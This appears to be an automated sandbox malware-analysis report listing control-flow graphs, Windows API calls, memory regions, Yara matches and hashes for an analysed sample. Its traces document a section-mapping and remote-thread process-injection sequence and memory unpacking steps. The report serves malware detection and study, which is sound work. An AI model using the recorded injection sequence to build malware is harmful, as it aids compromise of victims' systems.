                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
                                                                                                                                              • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                                                                              • Opcode Fuzzy Hash: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
                                                                                                                                              • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 349 4015e6-40160a call 401240 354 40160c 349->354 355 40160f-401614 349->355 354->355 357 40161a-40162b 355->357 358 40193e-401946 355->358 361 401631-40165a 357->361 362 40193c 357->362 358->355 363 40194b-40198e call 401240 358->363 361->362 370 401660-401677 NtDuplicateObject 361->370 362->363 370->362 372 40167d-4016a1 NtCreateSection 370->372 375 4016a3-4016c4 NtMapViewOfSection 372->375 376 4016fd-401723 NtCreateSection 372->376 375->376 378 4016c6-4016e2 NtMapViewOfSection 375->378 376->362 379 401729-40172d 376->379 378->376 381 4016e4-4016fa 378->381 379->362 382 401733-401754 NtMapViewOfSection 379->382 381->376 382->362 384 40175a-401776 NtMapViewOfSection 382->384 384->362 385 40177c 384->385 385->362 388 40177c call 401781 385->388 388->362
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
                                                                                                                                              • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                                                                              • Opcode Fuzzy Hash: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
                                                                                                                                              • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 419 403043-403067 420 40319a-40319f 419->420 421 40306d-403085 419->421 421->420 422 40308b-40309c 421->422 423 40309e-4030a7 422->423 424 4030ac-4030ba 423->424 424->424 425 4030bc-4030c3 424->425 426 4030e5-4030ec 425->426 427 4030c5-4030e4 425->427 428 40310e-403111 426->428 429 4030ee-40310d 426->429 427->426 430 403113-403116 428->430 431 40311a 428->431 429->428 430->431 432 403118 430->432 431->423 433 40311c-403121 431->433 432->433 433->420 434 403123-403126 433->434 434->420 435 403128-403197 RtlCreateUserThread NtTerminateProcess 434->435 435->420
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 70 216003c-2160047 71 216004c-2160263 call 2160a3f call 2160e0f call 2160d90 VirtualAlloc 70->71 72 2160049 70->72 87 2160265-2160289 call 2160a69 71->87 88 216028b-2160292 71->88 72->71 93 21602ce-21603c2 VirtualProtect call 2160cce call 2160ce7 87->93 90 21602a1-21602b0 88->90 92 21602b2-21602cc 90->92 90->93 92->90 99 21603d1-21603e0 93->99 100 21603e2-2160437 call 2160ce7 99->100 101 2160439-21604b8 VirtualFree 99->101 100->99 103 21605f4-21605fe 101->103 104 21604be-21604cd 101->104 107 2160604-216060d 103->107 108 216077f-2160789 103->108 106 21604d3-21604dd 104->106 106->103 110 21604e3-2160505 106->110 107->108 113 2160613-2160637 107->113 111 21607a6-21607b0 108->111 112 216078b-21607a3 108->112 121 2160517-2160520 110->121 122 2160507-2160515 110->122 114 21607b6-21607cb 111->114 115 216086e-21608be LoadLibraryA 111->115 112->111 116 216063e-2160648 113->116 118 21607d2-21607d5 114->118 120 21608c7-21608f9 115->120 116->108 119 216064e-216065a 116->119 123 21607d7-21607e0 118->123 124 2160824-2160833 118->124 119->108 125 2160660-216066a 119->125 126 2160902-216091d 120->126 127 21608fb-2160901 120->127 128 2160526-2160547 121->128 122->128 129 21607e4-2160822 123->129 130 21607e2 123->130 132 2160839-216083c 124->132 131 216067a-2160689 125->131 127->126 136 216054d-2160550 128->136 129->118 130->124 133 2160750-216077a 131->133 134 216068f-21606b2 131->134 132->115 135 216083e-2160847 132->135 133->116 137 21606b4-21606ed 134->137 138 21606ef-21606fc 134->138 139 216084b-216086c 135->139 140 2160849 135->140 142 2160556-216056b 136->142 143 21605e0-21605ef 136->143 137->138 144 21606fe-2160748 138->144 145 216074b 138->145 139->132 140->115 146 216056f-216057a 142->146 147 216056d 142->147 143->106 144->145 145->131 148 216057c-2160599 146->148 149 216059b-21605bb 146->149 147->143 154 21605bd-21605db 148->154 149->154 154->136
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_2160000_C12E.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 389 4171e6-4171ed 390 4171f0-417200 389->390 391 417202 390->391 392 417208-41720b 390->392 391->392 392->390 393 41720d-41722e LoadLibraryW call 416bd0 call 416e20 392->393 398 417230-417237 393->398 399 417239-417247 MoveFileA 398->399 400 41724d-417253 398->400 399->400 401 417255 call 416bc0 400->401 402 41725a-417261 400->402 401->402 404 417270-417277 402->404 405 417263-41726a InterlockedDecrement 402->405 404->398 407 417279-417289 404->407 405->404 408 417290-4172a0 407->408 410 4172a2 408->410 411 4172a9-4172ac 408->411 410->411 411->408 412 4172ae-4172b9 411->412 413 4172c0-4172c5 412->413 414 4172c7-4172cd 413->414 415 4172cf-4172d5 413->415 414->415 416 4172d7-4172e4 414->416 415->413 415->416
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNELBASE(00419374), ref: 00417212
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00417247
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041726A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementFileInterlockedLibraryLoadMove
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 418655872-956986773
                                                                                                                                              • Opcode ID: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
                                                                                                                                              • Instruction ID: bc3d966121456f33088ba0261fb492972a46eee307fae20126fe30775f8c93fb
                                                                                                                                              • Opcode Fuzzy Hash: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
                                                                                                                                              • Instruction Fuzzy Hash: 862123349482148BCB349B60DC467DABB70FB58315F1244AFEA4997290CA3C5CD98799

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 418 416bd0-416d10 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00512CE8), ref: 00416CAF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0041D210), ref: 00416CEC
                                                                                                                                              • VirtualProtect.KERNELBASE(00512B2C,00512CE4,00000040,?), ref: 00416D0B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                                              • Opcode ID: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
                                                                                                                                              • Instruction ID: d8462089c25fc9d344aee2fc6fb1be1e63980dafba0cd980b71d8e6a5f25c2b5
                                                                                                                                              • Opcode Fuzzy Hash: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
                                                                                                                                              • Instruction Fuzzy Hash: C331285095C380D9E301CBB8FC047853F61AB39708F04C1A89658873B5D7BE9A69D7AE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 436 7906f8-790711 437 790713-790715 436->437 438 79071c-790728 CreateToolhelp32Snapshot 437->438 439 790717 437->439 440 790738-790745 Module32First 438->440 441 79072a-790730 438->441 439->438 442 79074e-790756 440->442 443 790747-790748 call 7903b7 440->443 441->440 446 790732-790736 441->446 447 79074d 443->447 446->437 446->440 447->442
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00790720
                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 00790740
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_78d000_C12E.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction ID: 7893cea5cab22b21ca84268ee5d3752962a7d2e24b511fa50eabd763e6895f4f
                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction Fuzzy Hash: EAF06D32210714AFEF603AF9B88DA6A76E8AF49734F100528E646914C0DB78FC458AA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 449 2160e0f-2160e24 SetErrorMode * 2 450 2160e26 449->450 451 2160e2b-2160e2c 449->451 450->451
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
                                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_2160000_C12E.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 452 401991-4019ed call 401240 Sleep 464 4019f3-4019f5 452->464 465 4019ee call 4014c4 452->465 466 401a04-401a52 call 401240 464->466 467 4019f7-4019ff call 4015b7 464->467 465->464 467->466
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                              • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                                                                              • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                              • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 481 4019a9-4019ed call 401240 Sleep 493 4019f3-4019f5 481->493 494 4019ee call 4014c4 481->494 495 401a04-401a52 call 401240 493->495 496 4019f7-4019ff call 4015b7 493->496 494->493 496->495
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                              • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                                                                              • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                              • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 510 4019af-4019ed call 401240 Sleep 517 4019f3-4019f5 510->517 518 4019ee call 4014c4 510->518 519 401a04-401a52 call 401240 517->519 520 4019f7-4019ff call 4015b7 517->520 518->517 520->519
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                              • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                                                                              • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                              • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                              • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                                                                              • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                              • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00790408
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_78d000_C12E.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction ID: a8e614beb991ba9f0098511ed0293267299951bc67b34537aa3ae56693e866fc
                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction Fuzzy Hash: E5113C79A00208EFDB01DF98C989E98BBF5AF08350F058094FA489B362D375EA50DF80
                                                                                                                                              APIs
                                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00512CE4,004171C7), ref: 00416BA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocLocal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                              • Opcode ID: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
                                                                                                                                              • Instruction ID: 615a9cd2e73dd742d4f8b12f5f73b1ecb849c910c1908f7c89a030002a05c084
                                                                                                                                              • Opcode Fuzzy Hash: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
                                                                                                                                              • Instruction Fuzzy Hash: A7B092B0144200ABD3418FB0AD44B943BA4E318302F028115F600811A0CA201818AF14
                                                                                                                                              APIs
                                                                                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416E54
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00416E6F
                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00416E8E
                                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00416E9D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C12E.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4159173863-0
                                                                                                                                              • Opcode ID: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
                                                                                                                                              • Instruction ID: 37e889f167100b587a02f92b955e498922163858d7d7aab38356b1d4f56091a8
                                                                                                                                              • Opcode Fuzzy Hash: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
                                                                                                                                              • Instruction Fuzzy Hash: 3401D474640308ABC760EB64EC45BDA7BB8E71C319F01416AF70997290DE349D88CBA9

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:9.6%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:33.8%
                                                                                                                                              Total number of Nodes:1016
                                                                                                                                              Total number of Limit Nodes:18
                                                                                                                                              execution_graph 9924 1400010ec 9927 140001000 9924->9927 9928 140001023 9927->9928 9929 1400010cc 9927->9929 9930 14000104f 9928->9930 9936 140001031 9928->9936 9942 1400027a0 9930->9942 9932 1400027a0 18 API calls 9935 14000104a 9932->9935 9934 140001076 9937 14000107a wsprintfW lstrcatW 9934->9937 9961 14000c698 9935->9961 9936->9932 9937->9935 9937->9937 9943 1400027d1 9942->9943 9944 140002807 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 9943->9944 9945 140001059 wsprintfW 9943->9945 9946 140002844 ??2@YAPEAX_K GetEnvironmentVariableW 9944->9946 9947 1400028ad SetLastError 9944->9947 9945->9934 9945->9935 9949 140002873 GetLastError 9946->9949 9956 14000289e 9946->9956 9947->9945 9948 1400028c3 9947->9948 9950 1400028e1 lstrlenA ??2@YAPEAX_K 9948->9950 9974 140002730 9948->9974 9951 14000287d 9949->9951 9949->9956 9953 140002916 GetLocaleInfoW 9950->9953 9954 14000295f MultiByteToWideChar 9950->9954 9955 140002887 lstrcmpiW 9951->9955 9951->9956 9958 140002941 _wtol 9953->9958 9959 140002959 9953->9959 9954->9945 9955->9956 9960 140002894 ??3@YAXPEAX 9955->9960 9956->9947 9958->9954 9959->9954 9960->9956 9962 14000c6b1 9961->9962 9963 1400010bb 9961->9963 9979 14000aec0 9962->9979 9970 140005cc4 9963->9970 9966 14000c6f5 9984 14000af54 9966->9984 9967 14000c6df IsBadReadPtr 9967->9966 9971 140005cd1 9970->9971 9972 1400010c0 ExitProcess 9970->9972 10064 140003bb8 9971->10064 9975 14000275b 9974->9975 9976 140002740 GetUserDefaultUILanguage 9974->9976 9975->9950 9976->9975 9977 140002760 GetSystemDefaultUILanguage 9976->9977 9977->9975 9978 14000276c GetSystemDefaultLCID 9977->9978 9978->9975 9980 140001190 2 API calls 9979->9980 9981 14000aeed 9980->9981 9982 14000af49 IsWindow 9981->9982 9983 14000af1d GetSystemMetrics GetSystemMetrics 9981->9983 9982->9966 9982->9967 9983->9982 9985 14000afe2 ??3@YAXPEAX 9984->9985 9986 14000af70 9984->9986 9985->9963 9986->9985 9997 140002d28 9986->9997 9989 140002d28 2 API calls 9990 14000af8f 9989->9990 10001 14000594c 9990->10001 9992 14000af99 9993 14000594c 15 API calls 9992->9993 9994 14000afa3 9993->9994 9996 14000a63c 19 API calls 9994->9996 9995 14000afc6 ??3@YAXPEAX ??3@YAXPEAX 9995->9985 9996->9995 9998 140002d50 9997->9998 9999 140001190 2 API calls 9998->9999 10000 140002d67 9999->10000 10000->9989 10002 1400033a4 4 API calls 10001->10002 10003 14000595a 10002->10003 10027 1400053b4 10003->10027 10028 140001190 2 API calls 10027->10028 10029 1400053e1 10028->10029 10030 140001190 2 API calls 10029->10030 10032 140005406 10029->10032 10030->10032 10031 140002d94 2 API calls 10033 14000543a 10031->10033 10032->10031 10034 140002d28 2 API calls 10033->10034 10035 14000544b 10034->10035 10051 1400052d8 10035->10051 10038 140005471 10039 140001190 2 API calls 10038->10039 10041 14000548c 10039->10041 10040 140002d94 2 API calls 10042 1400054c0 10040->10042 10041->10040 10043 140002d28 2 API calls 10042->10043 10044 1400054d1 10043->10044 10045 1400052d8 4 API calls 10044->10045 10046 1400054e3 ??3@YAXPEAX 10045->10046 10047 140002d28 2 API calls 10046->10047 10048 1400054fe 10047->10048 10049 1400052d8 4 API calls 10048->10049 10050 14000550e ??3@YAXPEAX 10049->10050 10052 140005303 ??3@YAXPEAX 10051->10052 10053 14000530a 10051->10053 10052->10038 10052->10041 10053->10052 10054 140005356 memcpy 10053->10054 10056 140004040 10053->10056 10054->10053 10057 140004070 10056->10057 10059 14000407c 10056->10059 10060 1400031c8 10057->10060 10059->10053 10062 1400031e7 10060->10062 10061 140003239 memcpy 10062->10061 10063 140001190 2 API calls 10062->10063 10063->10061 10065 140003bd1 GetFileAttributesW 10064->10065 10069 140003bca 10064->10069 10066 140003bdc 10065->10066 10065->10069 10067 140003be3 SetFileAttributesW 10066->10067 10068 140003bfe 10066->10068 10067->10069 10070 140003bef DeleteFileW 10067->10070 10072 140003a74 10068->10072 10069->9972 10070->10069 10073 140002d28 2 API calls 10072->10073 10074 140003a96 10073->10074 10075 140002d94 2 API calls 10074->10075 10076 140003aa7 FindFirstFileW 10075->10076 10077 140003b6e 